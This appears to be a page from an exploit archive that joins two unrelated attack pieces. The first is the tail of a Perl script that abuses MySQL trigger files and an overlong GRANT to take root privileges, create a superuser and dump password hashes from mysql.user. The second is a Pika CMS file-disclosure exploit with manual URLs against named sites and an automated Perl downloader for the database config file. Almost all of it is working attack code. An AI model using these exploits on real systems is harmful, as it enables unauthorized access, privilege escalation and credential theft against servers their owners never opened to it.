"select 'TYPE=TRIGGERS' into outfile'".$folder.$database."/rootme.TRG' LINES TERMINATED BY '\\ntriggers=\\'CREATE DEFINER=`root`\@`localhost` trigger atk after insert on rootme for each row\\\\nbegin \\\\nUPDATE mysql.user SET Select_priv=\\\\\\'Y\\\\\\', Insert_priv=\\\\\\'Y\\\\\\', Update_priv=\\\\\\'Y\\\\\\', Delete_priv=\\\\\\'Y\\\\\\', Create_priv=\\\\\\'Y\\\\\\', Drop_priv=\\\\\\'Y\\\\\\', Reload_priv=\\\\\\'Y\\\\\\', Shutdown_priv=\\\\\\'Y\\\\\\', Process_priv=\\\\\\'Y\\\\\\', File_priv=\\\\\\'Y\\\\\\', Grant_priv=\\\\\\'Y\\\\\\', References_priv=\\\\\\'Y\\\\\\', Index_priv=\\\\\\'Y\\\\\\', Alter_priv=\\\\\\'Y\\\\\\', Show_db_priv=\\\\\\'Y\\\\\\', Super_priv=\\\\\\'Y\\\\\\', Create_tmp_table_priv=\\\\\\'Y\\\\\\', Lock_tables_priv=\\\\\\'Y\\\\\\', Execute_priv=\\\\\\'Y\\\\\\', Repl_slave_priv=\\\\\\'Y\\\\\\', Repl_client_priv=\\\\\\'Y\\\\\\', Create_view_priv=\\\\\\'Y\\\\\\', Show_view_priv=\\\\\\'Y\\\\\\', Create_routine_priv=\\\\\\'Y\\\\\\', Alter_routine_priv=\\\\\\'Y\\\\\\', Create_user_priv=\\\\\\'Y\\\\\\', Event_priv=\\\\\\'Y\\\\\\', Trigger_priv=\\\\\\'Y\\\\\\', ssl_type=\\\\\\'Y\\\\\\', ssl_cipher=\\\\\\'Y\\\\\\', x509_issuer=\\\\\\'Y\\\\\\', x509_subject=\\\\\\'Y\\\\\\', max_questions=\\\\\\'Y\\\\\\', max_updates=\\\\\\'Y\\\\\\', max_connections=\\\\\\'Y\\\\\\' WHERE User=\\\\\\'$user\\\\\\';\\\\nend\\'\\nsql_modes=0\\ndefiners=\\'root\@localhost\\'\\nclient_cs_names=\\'latin1\\'\\nconnection_cl_names=\\'latin1_swedish_ci\\'\\ndb_cl_names=\\'latin1_swedish_ci\\'\\n';";
}
print $inject;#exit;
$inject2 =
"SELECT 'TYPE=TRIGGERNAME\\ntrigger_table=rootme;' into outfile '".$folder.$database."/atk.TRN' FIELDS ESCAPED BY ''";
my $dbh = DBI->connect("DBI:mysql:database=$database;host=$target;",
"$user", "$password",
{'RaiseError' => 0});
eval { $dbh->do("DROP TABLE rootme") };
$dbh->do("CREATE TABLE rootme (rootme VARCHAR(256));");
$dbh->do($inject);
$dbh->do($inject2);
$a = "A" x 10000;
$dbh->do("grant all on $a.* to 'user'\@'%' identified by 'secret';");
sleep(3);
my $dbh = DBI->connect("DBI:mysql:database=$database;host=$target;",
"$user", "$password",
{'RaiseError' => 0});
$dbh->do("INSERT INTO rootme VALUES('ROOTED');");
$dbh->do("grant all on $a.* to 'user'\@'%' identified by 'secret';");
sleep(3);
my $dbh = DBI->connect("DBI:mysql:database=$database;host=$target;",
"$user", "$password",
{'RaiseError' => 0});
$dbh->do("CREATE USER '$newuser'\@'%' IDENTIFIED BY '$newuserpass';");
$dbh->do("GRANT ALL PRIVILEGES ON *.* TO '$newuser'\@'%' WITH GRANT OPTION;");
$dbh->do("grant all on $a.* to 'user'\@'%' identified by 'secret';");
sleep(3);
my $dbh = DBI->connect("DBI:mysql:host=$target;",
$newuser, $newuserpass,
{'RaiseError' => 0});
my $sth = $dbh->prepare("SELECT * FROM mysql.user");
$sth->execute();
print "W00TW00T!\n";
while (my $ref = $sth->fetchrow_hashref()) {
print "Found a row: id = $ref->{'User'}, name = $ref->{'Password'}\n";
}
$sth->finish();
KnocKout/Pika CMS baza_mysql.php File Disclosure ( na)
Pika CMS <= Remote 'baza_mysql.php' Disclosure Exploit
[+] Site : 1337day.com
[+] Support e-mail : submit[at]1337day.com
I'm KnocKout member from Inj3ct0r Team
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Live Contact : knockoutr@msn.com
[~] E-Mail : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com - http://1337day.com
[~] Reference : http://h4x0resec.blogspot.com
[~] Special Thanks : Kalashinkov3 <= :)
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Pika CMS
|~Price : N/A
|~Version : N/A
|~Software: http://www.pikacms.com/
|~Vulnerability Style : file disclosure
|~Vulnerability Dir : /
|~Google Keyword : "Powered by PikaCMS!"
|[~]Date : "31.05.2011"
----------------------------------------------------------
shkarko.php <= the 'f' parameter is not sanitized (file disclosure)
---------------------------------------------------------
Manual Exploitation
http://www.fleteteverdha.info/shkarko.php?f=lidhjet/baza_mysql.php
http://www.pikacms.com/shkarko.php?f=lidhjet/baza_mysql.php
http://www.vetemlojra.com/shkarko.php?f=lidhjet/baza_mysql.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
=============== Automatic Disclosure Exploit (PikaCms.PL) =================================================
use LWP::Simple;
use LWP::UserAgent;
system('cls');
system("title Pika CMS <= Remote 'baza_mysql.php' Disclosure Exploit");
system('color 2');
if(@ARGV < 2)
{
print "[-]Su Sekilde Kocum. \n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 HedefWeb /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
print "\n************************************************************************\n";
print "\* Pika CMS <= Remote 'baza_mysql.php' Disclosure Exploit *\n";
print "\* Exploited By : KnocKout *\n";
print "\* Contact : knockoutr[at]msn[dot]com *\n";
print "\* -- *\n";
print "\*********************************************************************\n\n\n";
($TargetIP, $path, $File,) = @ARGV;
$File="shkarko.php?f=lidhjet/baza_mysql.php";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Az Bekle Sikertiyorum!!! \n\n";
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "baza_mysql.php");
if ($request->is_success)
{
print "[+] $url <= Hedef Site Exploit Edildi!\n\n";
print "[+] OPERASYON TAMAM !\n";
print "[+] baza_mysql.php Dosyasi Indirildi (z_WALKING_TIMES_DATA.php)\n";
print "[+] GRAYHATZ STAR \n";
print "[+] Special tnX # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ ....
\n";
exit();
}
else
{
print "[!] Exploit $url Basarisiz !\n[!] ".$request->status_line."\n";
exit();
}
================================================================
Pika CMS suffers from a baza_mysql.php disclosure vulnerability.